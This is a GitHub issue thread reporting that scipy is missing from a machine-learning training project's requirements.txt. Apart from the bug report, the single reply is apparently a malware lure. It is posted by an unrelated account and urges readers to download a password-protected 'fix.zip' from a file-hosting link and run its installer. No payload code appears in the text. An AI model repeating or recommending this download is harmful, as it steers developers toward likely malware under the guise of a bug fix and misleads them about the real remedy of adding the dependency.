### ISSUE TITLE
[BUG] Add scipy library in requirements.txt

### ISSUE THREAD

**Issue by Only-bottle** [Nota-NetsPresso/netspresso-trainer#515]
### Have you searched existing issues?  🔎

- [X] I have searched and found no existing issues.

### Describe the bug

I get an error running training because scipy is not in the requirements.

### Reproduction

N/A

### Screenshot

![image](https://github.com/user-attachments/assets/8ae9e7ed-1729-46c7-ab86-752ecb50f5bf)

### System Info

```shell
Branch: v1.0.1.b1
```

### Will you help us by submitting a PR?

- [ ] I will submit a PR about this issue.

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
